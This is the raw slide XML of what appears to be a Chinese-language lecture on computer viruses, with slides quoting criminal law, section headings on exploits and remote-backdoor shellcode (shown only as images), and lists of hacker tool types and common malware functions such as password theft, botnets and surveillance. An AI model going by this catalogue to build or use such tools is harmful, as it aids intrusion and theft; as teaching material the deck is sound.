        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1346200" y="1670050"/>
            <a:ext cx="7620000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>违反国家规定，对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作，后果严重的，依照前款的规定处罚。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>故意制作、传播计算机病毒等破坏性程序，影响计算机系统正常运行，后果严重的，依照第一款的规定处罚。 </a:t>
            </a:r>
          </a:p>
          <a:p>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8450CE1-8064-4DB8-BCA8-C1191221EF25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.2.10 Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="139267" name="Picture 2" descr="http://images.cnitblog.com/blog/405877/201308/10184630-282e829d31cf4221beb7c2ed327f9993.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA1F49DA-5CD8-43AC-B24A-F242551BD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738" y="765175"/>
            <a:ext cx="7956550"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456C53C8-DD73-44E3-8102-B721BD607DAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.2.10 Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="140291" name="Picture 2" descr="http://images.cnitblog.com/blog/405877/201308/10184650-e012f76a285a430da70e67128de2674e.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C60FE25-E58B-4175-8384-1BE7F8E99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92150"/>
            <a:ext cx="701675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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B298BD93-44B7-47CD-A84F-EE9D2BBE82D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>开启一个远程后门并获得命令行的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="141315" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65AC9744-EBC5-476C-9440-09D4769843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1989138"/>
            <a:ext cx="5848350"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B6FF96FD-151F-4B7C-B26B-83E7A1AB7CDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142339" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6D0AF10-35DE-4F18-9245-B9B92A223511}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="142340" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BED7BEC3-EA01-4F10-9B30-B84B755CD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500063"/>
            <a:ext cx="8670925" cy="614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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D206AE6-A795-405B-A9C5-85EE4566DE88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.2.11 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>黑客工具等</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143363" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{112CF007-8508-4301-8C85-CF7C19B847B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>黑客工具：各类用于网络和主机渗透的软件，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>各类扫描器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>后门植入工具</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>密码嗅探器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>权限提升工具</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>…</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E2AB9E5-0970-4939-9AC7-E9692F7017F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144387" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81A9821C-9B86-4B7E-80EA-18CB4516C08A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="144388" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6DBF1C5-B62D-442F-BC2D-237416B88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244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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCAFE3D7-3C9A-4CF1-B2F2-546EE49E5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0" y="0"/>
            <a:ext cx="490537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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01C9C2E2-AA51-4039-86A9-1DBBA9765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1238250"/>
            <a:ext cx="7534275"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slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71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7172"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="12"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA8D72BD-57A5-4648-B678-92E6F86AF851}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145411" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D17FA8BE-B495-4E49-AFFB-9BE0C6666D35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="145412" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69A46EB3-5C89-499A-B1D6-EC3003C1A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8" y="1163638"/>
            <a:ext cx="9231312" cy="536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标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DEC7631-976E-488F-B8D4-9E2EEFE7F6CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>2.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>计算机病毒的典型破坏功能</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91147E4C-2790-4815-8FF2-9ECADF085B3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如果让你设计一款计算机病毒，你希望其具有哪些功能？可以实现哪些目的？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>计算机所面临的来自哪里？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>人</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slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">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slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">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slide(fromBottom)">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标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAF78FDC-C838-4EA2-88ED-C3A3A0C8B35E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.3.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目前病毒程序常见的功能</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DE5D738-5E5A-459E-B4DA-201C77A34AD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>盗取各类用户名和密码（包括：邮箱、聊天工具、论坛）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>窃取各类私密文档</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>窃取网络游戏装备</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>控制目标主机</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>监控对方屏幕操作、侵犯目标系统隐私</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>监听窃视（麦克风、摄像头）</a:t>
            </a:r>
          </a:p>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lide(fromBottom)">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lide(fromBottom)">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lide(fromBottom)">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lide(fromBottom)">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482" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21F551FB-BFBA-4D83-99BE-1D73231B8ECA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000"/>
              <a:t>目前病毒程序常见的功能（续）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{628429E3-6E5A-4889-A964-8DFF41E42AB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>窃取网银、股票交易系统账户</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送垃圾邮件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>盗取个人信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发展僵尸网络客户端</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>瘫痪目标系统</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>破坏目标系统数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>渗透到其他计算机</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实施军事或政治目的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pP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Bottom)">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lide(fromBottom)">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lide(fromBottom)">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lide(fromBottom)">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lide(fromBottom)">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lide(fromBottom)">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slide(fromBottom)">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slide(fromBottom)">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slide(fromBottom)">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rategic">
  <a:themeElements>
    <a:clrScheme name="Strategic 2">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="E9E2B6"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="996600"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="786950"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="727DE0"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="D54F41"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="F2EED7"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="000000"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="BCBFED"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="C1473A"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="003300"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="339933"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Strategic">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trategic 1">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="EAEAEA"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="819E81"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="FFCC66"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="727DE0"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="D54F41"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="C1CCC1"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="C8C8C8"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="BCBFED"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="C1473A"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="003300"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="663300"/>
        </a:folHlink>
      </a:clrScheme>
      <a:clrMap bg1="dk2" tx1="lt1" bg2="dk1" tx2="lt2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
    </a:extraClrScheme>
    <a:extraClrScheme>
      <a:clrScheme name="Strategic 2">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="E9E2B6"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="996600"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="786950"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="727DE0"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="D54F41"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="F2EED7"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="000000"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="BCBFED"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="C1473A"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="003300"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="339933"/>
        </a:folHlink>
      </a:clrScheme>
      <a:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
    </a:extraClrScheme>
    <a:extraClrScheme>
      <a:clrScheme name="Strategic 3">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="000000"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="5F5F5F"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="CBCBCB"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="808080"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="000000"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="E2E2E2"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="737373"/>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trategic 4">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="EAEAEA"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="BC6262"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="FFCC66"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="727DE0"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="D54F41"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="DAB7B7"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="C8C8C8"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="BCBFED"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="C1473A"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="000066"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="FFFF99"/>
        </a:folHlink>
      </a:clrScheme>
      <a:clrMap bg1="dk2" tx1="lt1" bg2="dk1" tx2="lt2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
    </a:extraClrScheme>
    <a:extraClrScheme>
      <a:clrScheme name="Strategic 5">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="EAEAEA"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="5C74A4"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="FFCC99"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="727DE0"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="D54F41"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="B5BCCF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="C8C8C8"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="BCBFED"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="C1473A"/>
        </a:accent6>
